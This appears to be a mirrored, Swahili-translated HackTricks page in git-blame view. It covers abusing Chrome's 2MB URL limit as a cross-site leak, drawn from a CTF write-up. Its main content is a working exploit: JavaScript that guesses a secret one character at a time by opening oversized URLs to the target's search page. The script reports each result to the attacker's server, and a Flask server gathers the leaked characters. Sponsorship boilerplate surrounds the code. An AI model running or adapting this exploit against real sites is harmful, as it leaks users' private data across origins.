Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-04 18:40:54 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search/url-max-length-client-side.md

92 lines
3.9 KiB
Markdown
Raw Normal View History

Translated to Swahili
2024-02-11 02:13:58 +00:00
# Urefu Maksimum wa URL - Upande wa Mteja
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
<details>
Translated to Swahili
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
Translated to Swahili
2024-02-11 02:13:58 +00:00
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
</details>
Translated to Swahili
2024-02-11 02:13:58 +00:00
Nambari kutoka [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
```html
<html>
<body></body>
<script>
Translated to Swahili
2024-02-11 02:13:58 +00:00
(async () => {
const curr = "http://secrets.wtl.pw/search?query=HackTM{"
const leak = async (char) => {
fetch("/?try=" + char)
let w = window.open(curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))
const check = async () => {
try {
w.origin
} catch {
fetch("/?nope=" + char)
return
}
setTimeout(check, 100)
}
check()
}
const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
for (let i = 0; i < CHARSET.length; i++) {
leak(CHARSET[i])
await new Promise(resolve => setTimeout(resolve, 50))
}
})()
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
</script>
</html>
```
Translated to Swahili
2024-02-11 02:13:58 +00:00
Upande wa seva:
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
```python
from flask import Flask, request
app = Flask(__name__)
CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
chars = []
@app.route('/', methods=['GET'])
def index():
Translated to Swahili
2024-02-11 02:13:58 +00:00
global chars
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
Translated to Swahili
2024-02-11 02:13:58 +00:00
nope = request.args.get('nope', '')
if nope:
chars.append(nope)
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
Translated to Swahili
2024-02-11 02:13:58 +00:00
remaining = [c for c in CHARSET if c not in chars]
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
Translated to Swahili
2024-02-11 02:13:58 +00:00
print("Remaining: {}".format(remaining))
return "OK"
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
@app.route('/exploit.html', methods=['GET'])
def exploit():
Translated to Swahili
2024-02-11 02:13:58 +00:00
return open('exploit.html', 'r').read()
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
if __name__ == '__main__':
Translated to Swahili
2024-02-11 02:13:58 +00:00
app.run(host='0.0.0.0', port=1337)
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
```
<details>
Translated to Swahili
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
Translated to Swahili
2024-02-11 02:13:58 +00:00
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
GITBOOK-3817: No subject
2023-03-05 22:20:47 +00:00
</details>
Reference in a new issue Copy permalink